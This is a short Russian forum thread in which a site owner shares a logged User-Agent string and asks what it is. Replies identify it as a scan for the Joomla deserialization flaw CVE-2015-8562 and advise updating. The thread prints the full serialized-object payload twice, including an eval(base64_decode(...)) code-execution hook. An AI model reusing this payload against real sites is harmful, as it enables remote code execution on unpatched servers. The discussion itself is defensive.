HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.11.2016, 19:32
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию

В логах всплыла такая строчка

IP: 31.173.226.6

User Agent:

gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3: {s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:" \0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"S implePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverM ysql":0:{}s:5:"cache";b:1;s:19:"cache_name_functio n";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed _url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}} s:13:"\0\0\0connection";i:1;}󓲑

NO REFERER

2016-11-01 16:26:25

Не пойму это эксплойт какойто или что?

Сидеть спокойно или заморочиться c защитой?
 
Ответить с цитированием

  #2  
Старый 01.11.2016, 19:35
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от FriLL  
FriLL said:

В логах всплыла такая строчка
IP: 31.173.226.6
User Agent:
gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3: {s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:" \0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"S implePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverM ysql":0:{}s:5:"cache";b:1;s:19:"cache_name_functio n";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed _url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}} s:13:"\0\0\0connection";i:1;}󓲑
NO REFERER
2016-11-01 16:26:25
Не пойму это эксплойт какойто или что?
Сидеть спокойно или заморочиться c защитой?
это похоже на свежий баг сериализации, которым порнхаб хакнули, ну пыху обнови и не парься

а может и бекдор где то валяется в коде
 
Ответить с цитированием

  #3  
Старый 01.11.2016, 19:39
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

а ёп это джумла

https://cve.mitre.org/cgi-bin/cvenam...=CVE-2015-8562

https://www.exploit-db.com/exploits/38977/

обновить джумлу или забить если её нет вовсе
 
Ответить с цитированием

  #4  
Старый 01.11.2016, 19:40
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию

Ну вроде обновляю переодически

Цитата:
Сообщение от t0ma5  
t0ma5 said:

а может и бекдор где то валяется в коде
Да там код как 2 копейки, заметил бы
 
Ответить с цитированием

  #5  
Старый 01.11.2016, 19:41
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от FriLL  
FriLL said:

Ну вроде обновляю переодически
Да там код как 2 копейки, заметил бы
да я поспешил с первым ответом, это ищут уязвимые joomla движки
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ